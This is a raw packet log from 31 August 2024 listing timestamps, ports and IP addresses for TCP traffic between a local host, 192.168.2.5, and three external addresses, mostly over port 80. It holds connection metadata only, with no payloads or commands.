Aug 31, 2024 15:44:21.118582010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118587971 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.118592978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118602037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118607044 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.118607044 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.118613005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118623972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118633986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118639946 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118643999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118639946 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118669987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118675947 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118675947 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118681908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118695974 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118701935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118714094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118724108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118732929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118736029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118746996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118757010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118758917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118771076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118782043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118789911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118796110 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118797064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118797064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118802071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118824005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118830919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118830919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118835926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118849039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118854046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118860006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118861914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118872881 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118881941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118890047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118890047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118891954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118904114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118917942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118918896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118931055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118940115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118952036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118963957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118966103 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118974924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118976116 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118976116 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118976116 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118985891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118999004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119008064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119010925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119016886 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119024038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119035006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119035959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119044065 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119046926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119057894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119064093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119069099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119072914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119081020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119091988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119105101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119106054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119106054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119116068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119127989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119127989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119127989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119138956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119152069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119152069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119163036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119168043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119174957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119185925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119195938 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119195938 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119196892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119209051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119225025 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119232893 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119244099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119256973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119266987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119271040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119277954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119290113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119301081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119308949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119313002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119323969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119323969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119324923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119334936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119349003 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119363070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119374990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119386911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119391918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119406939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119446039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119457006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119460106 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119468927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119482040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119493008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119503021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119508028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119514942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119514942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119540930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119545937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119554043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119565010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119570971 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119575977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119587898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119590044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119600058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119611025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119621038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119621992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119621992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119632959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119645119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119649887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119649887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119654894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119668007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119672060 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119688034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119699001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119704008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119704008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119709969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119721889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119733095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119739056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119740009 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119744062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119754076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119756937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119766951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119775057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119779110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119788885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119791031 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119801044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119810104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119817972 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119817972 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119821072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119833946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119838953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119847059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119857073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119859934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119873047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119878054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119884014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119895935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119903088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119903088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119906902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119920015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.119920015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119935989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119973898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119973898 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.119973898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.119986057 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.119997025 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.120007992 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.120018005 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.120029926 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.120043039 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.120058060 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.120086908 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.121655941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.121666908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.121681929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.121697903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.121710062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.121710062 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.121720076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.121726036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.121732950 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.121743917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.121750116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.121759892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.121772051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.121773958 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.121773958 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.121798038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.121906042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.141422987 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.141436100 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.141447067 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.141506910 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.141506910 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.142565966 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:21.144464970 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:21.148087978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.148099899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.148112059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.148128986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.148159981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.148164988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.148174047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.148185968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.148199081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.148207903 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.148279905 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.148303032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.148468971 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.149319887 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:21.149451971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.149512053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.149522066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.149535894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.149553061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.149563074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.149575949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.149580002 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.149586916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.149619102 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.149619102 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.149768114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.150378942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150398016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150408983 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150418997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150429010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150438070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.150439978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150453091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150463104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150482893 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.150482893 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.150505066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150521040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150528908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.150532961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150577068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.150577068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.150691032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150702953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150708914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150768042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.150768042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.150893927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150913000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150924921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150935888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150945902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150957108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150968075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150978088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.150986910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.150989056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.151002884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.151009083 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.151009083 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.151103973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.152422905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152434111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152446985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152549028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.152575016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152585983 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152591944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152596951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152602911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152607918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152618885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152630091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152642012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152653933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152663946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152672052 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.152672052 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.152677059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152688980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.152693033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152704954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152709007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.152718067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152729034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152736902 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.152767897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.152767897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.152770996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152853966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152865887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152952909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152964115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152976036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152982950 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.152987957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.152998924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.153009892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.153019905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.153032064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.153032064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.153064013 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.153064013 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.155881882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.155939102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.155949116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.155968904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.155981064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156001091 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.156071901 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.156075001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156088114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156097889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156109095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156133890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156143904 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.156145096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156157017 CEST	80	49727	52.212.52.84	192.168.2.5
